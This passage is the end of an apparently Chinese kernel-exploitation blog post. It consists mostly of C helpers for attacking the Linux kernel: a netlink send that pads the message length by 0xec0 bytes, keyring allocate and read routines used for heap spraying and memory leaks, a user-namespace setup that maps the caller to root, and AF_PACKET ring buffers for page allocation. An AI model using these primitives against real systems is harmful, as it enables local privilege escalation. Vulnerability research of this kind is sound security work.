        .iov_base = (void *)msg,
        .iov_len = msg->nlmsg_len + 0xec0,
    };
    struct msghdr hdr = {
        .msg_name = NULL,
        .msg_namelen = sizeof(struct sockaddr_nl),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    return sendmsg(sk, &hdr, 0);
}

/*
 * Send the request, then free the message and close the socket regardless
 * of the outcome. Returns the nl_sendmsg() result.
 */
int nl_complete_request(int sock, struct nlmsghdr *msg)
{
    const int sent = nl_sendmsg(sock, msg);

    nlmsg_free(msg);
    close(sock);
    return sent;
}

/* Return a pointer to the attribute payload, located right after its header. */
void *nla_data(const struct nlattr *nla)
{
    char *base = (char *)nla;

    return base + NLA_HDRLEN;
}

/* Size of an attribute with `payload` bytes of data, header included, unpadded. */
int nla_attr_size(int payload)
{
    const int header = NLA_HDRLEN;

    return header + payload;
}

/* Size of an attribute with `payload` bytes of data, rounded up to attribute alignment. */
int nla_total_size(int payload)
{
    const int unpadded = nla_attr_size(payload);

    return NLA_ALIGN(unpadded);
}

/* Number of padding bytes that follow an attribute with `payload` bytes of data. */
int nla_padlen(int payload)
{
    const int padded = nla_total_size(payload);
    const int unpadded = nla_attr_size(payload);

    return padded - unpadded;
}

/*
 * Append an attribute header of type `attrtype` with room for `attrlen`
 * payload bytes at the end of the message, zero its padding and grow the
 * message length accordingly. Returns the new attribute.
 */
struct nlattr *nla_reserve(struct nlmsghdr *msg, int attrtype, int attrlen)
{
    struct nlattr *attr = (struct nlattr *)nlmsg_tail(msg);
    unsigned char *raw = (unsigned char *)attr;

    attr->nla_type = attrtype;
    attr->nla_len = nla_attr_size(attrlen);

    memset(raw + attr->nla_len, 0, nla_padlen(attrlen));

    msg->nlmsg_len = NLMSG_ALIGN(msg->nlmsg_len) + nla_total_size(attrlen);
    return attr;
}

/*
 * Append an attribute of type `attrtype` carrying `datalen` bytes from `data`.
 *
 * `data` may be NULL only when `datalen` is 0 (as nla_nest_start() does).
 * Returns 0 on success, -1 on invalid arguments or if the attribute could
 * not be reserved.
 */
int nla_put(struct nlmsghdr *msg, int attrtype, int datalen, const void *data)
{
    struct nlattr *nla;

    if (datalen < 0 || (datalen > 0 && data == NULL))
        return -1;

    nla = nla_reserve(msg, attrtype, datalen);
    if (!nla)
        return -1;

    // memcpy() with a null source is undefined even for zero bytes, and
    // header-only attributes are created with data == NULL.
    if (datalen > 0)
        memcpy(nla_data(nla), data, datalen);
    return 0;
}

/* Append a 32-bit attribute; the value is copied as stored in memory. */
int nla_put_u32(struct nlmsghdr *msg, int attrtype, uint32_t value)
{
    const uint32_t word = value;

    return nla_put(msg, attrtype, sizeof(word), &word);
}

/* Append a string attribute, including its terminating NUL byte. */
int nla_put_string(struct nlmsghdr *msg, int attrtype, const char *str)
{
    const size_t with_nul = strlen(str) + 1;

    return nla_put(msg, attrtype, with_nul, str);
}

/* Append the payload of the message `nested` as a single attribute of `msg`. */
int nla_put_nested(struct nlmsghdr *msg, int attrtype, const struct nlmsghdr *nested)
{
    const int inner_len = nlmsg_datalen(nested);
    const void *inner = nlmsg_data(nested);

    return nla_put(msg, attrtype, inner_len, inner);
}

/*
 * Open a nested attribute: append an empty attribute flagged NLA_F_NESTED
 * and return its position so nla_nest_end() can fix up the length.
 * Returns NULL if the attribute could not be added.
 */
struct nlattr *nla_nest_start(struct nlmsghdr *msg, int attrtype)
{
    struct nlattr *nest = (struct nlattr *)nlmsg_tail(msg);
    const int rc = nla_put(msg, NLA_F_NESTED | attrtype, 0, NULL);

    return (rc < 0) ? NULL : nest;
}

/*
 * Close a nested attribute opened by nla_nest_start(): set its length to
 * everything appended since `start`, then pad the message to alignment.
 * Returns 0 on success, -1 if the padding could not be reserved.
 */
int nla_nest_end(struct nlmsghdr *msg, struct nlattr *start)
{
    size_t nest_len = (char *)nlmsg_tail(msg) - (char *)start;
    size_t gap;

    start->nla_len = nest_len;

    gap = NLMSG_ALIGN(msg->nlmsg_len) - msg->nlmsg_len;
    if (gap > 0 && !nlmsg_reserve(msg, gap, 0))
        return -1;

    return 0;
}

key.h

#include <linux/keyctl.h>
#include <sys/syscall.h>
#include <unistd.h>

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specifi*/
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's cont*/

/*
 * Add a key of type "user" to the process keyring.
 * Returns the add_key syscall result.
 */
int key_alloc(char *description, char *payload, size_t plen)
{
    const char *key_type = "user";

    return syscall(__NR_add_key, key_type, description, payload, plen,
                   KEY_SPEC_PROCESS_KEYRING);
}

/* Replace the payload of key `keyid`; returns the keyctl syscall result. */
int key_update(int keyid, char *payload, size_t plen)
{
    const int op = KEYCTL_UPDATE;

    return syscall(__NR_keyctl, op, keyid, payload, plen);
}

/*
 * Read the payload of key `keyid` into `buffer`.
 *
 * keyid:  key to read.
 * buffer: destination; taken as void * so callers can pass buffers of any
 *         element type without a pointer-type mismatch.
 * buflen: capacity of `buffer` in bytes.
 *
 * Returns the keyctl syscall result.
 */
int key_read(int keyid, void *buffer, size_t buflen)
{
    return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

/* Revoke key `keyid`; returns the keyctl syscall result. */
int key_revoke(int keyid)
{
    const int op = KEYCTL_REVOKE;

    return syscall(__NR_keyctl, op, keyid, 0, 0, 0);
}

/* Unlink key `keyid` from the process keyring; returns the keyctl syscall result. */
int key_unlink(int keyid)
{
    const int op = KEYCTL_UNLINK;

    return syscall(__NR_keyctl, op, keyid, KEY_SPEC_PROCESS_KEYRING);
}



pg_vec.h

#include <sys/mman.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/if_ether.h>

/* Print `s` together with the current errno text, then exit with status -1. */
void err_exit(char *s)
{
    const char *label = s;

    perror(label);
    exit(-1);
}
/*
 * Best-effort helper: write `text` to the file at `path`.
 * Failures are reported with perror() but do not abort the caller.
 */
static void unshare_write_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0)
        perror(path);
    close(fd);
}

/*
 * Enter new mount, user and network namespaces and map the caller's uid/gid
 * to 0 inside the new user namespace. Exits the process if unshare() fails.
 */
void unshare_setup(void)
{
    char edit[0x100];
    // The ids must be sampled BEFORE unshare(): once inside the new user
    // namespace with no mapping, getuid()/getgid() return the overflow id,
    // and writing that value into uid_map/gid_map is rejected.
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    if(unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET))
        err_exit("FAILED to create a new namespace");

    // setgroups must be denied before an unprivileged gid_map write.
    unshare_write_file("/proc/self/setgroups", "deny");

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_uid);
    unshare_write_file("/proc/self/uid_map", edit);

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_gid);
    unshare_write_file("/proc/self/gid_map", edit);
}


/*
 * Switch packet socket `s` to TPACKET_V3 and install an RX ring.
 *
 * block_size/block_nr: size and number of ring blocks.
 * frame_size:          frame size; the frame count is derived from it.
 * sizeof_priv:         per-block private area size.
 * timeout:             block retire timeout.
 *
 * Prints a message and exits with status -1 if either setsockopt() fails.
 */
void packet_socket_rx_ring_init(int s, unsigned int block_size,
        unsigned int frame_size, unsigned int block_nr,
        unsigned int sizeof_priv, unsigned int timeout) {
    int version = TPACKET_V3;
    struct tpacket_req3 ring;

    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) {
        puts("setsockopt(PACKET_VERSION)");
        exit(-1);
    }

    memset(&ring, 0, sizeof(ring));
    ring.tp_block_size = block_size;
    ring.tp_block_nr = block_nr;
    ring.tp_frame_size = frame_size;
    ring.tp_frame_nr = (block_size * block_nr) / frame_size;
    ring.tp_retire_blk_tov = timeout;
    ring.tp_sizeof_priv = sizeof_priv;
    ring.tp_feature_req_word = 0;

    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
        puts("setsockopt(PACKET_RX_RING)");
        exit(-1);
    }
}

/*
 * Create an AF_PACKET raw socket, install an RX ring on it and bind it to
 * the "lo" interface.
 *
 * Returns the socket. Prints a message and exits with status -1 if socket()
 * or bind() fails.
 */
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    struct sockaddr_ll link;
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

    if (fd < 0) {
        puts("socket(AF_PACKET)");
        exit(-1);
    }

    packet_socket_rx_ring_init(fd, block_size, frame_size, block_nr, sizeof_priv, timeout);

    memset(&link, 0, sizeof(link));
    link.sll_family = PF_PACKET;
    link.sll_protocol = htons(ETH_P_ALL);
    link.sll_ifindex = if_nametoindex("lo");
    link.sll_hatype = 0;
    link.sll_pkttype = 0;
    link.sll_halen = 0;

    if (bind(fd, (struct sockaddr *)&link, sizeof(link)) < 0) {
        puts("bind(AF_PACKET)");
        exit(-1);
    }

    return fd;
}
// count is the number of entries in the pg_vec array, i.e. pg_vec occupies count*8 bytes
// size/4096 is the order to allocate
int pagealloc_pad(int count, int size) {
    const unsigned int frame_size = 2048;
    const unsigned int priv_size = 0;
    const int retire_timeout = 100;

    return packet_socket_setup(size, frame_size, count, priv_size, retire_timeout);
}


注意点总结

  1. 要创建namespace和激活端口才能正确进行connect;

  2. ULP的设置要在建立连接之后;

  3. 新地址的绑定还要先connect一下?

  4. RCU宽限期


文章作者: q1ming
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !
  目录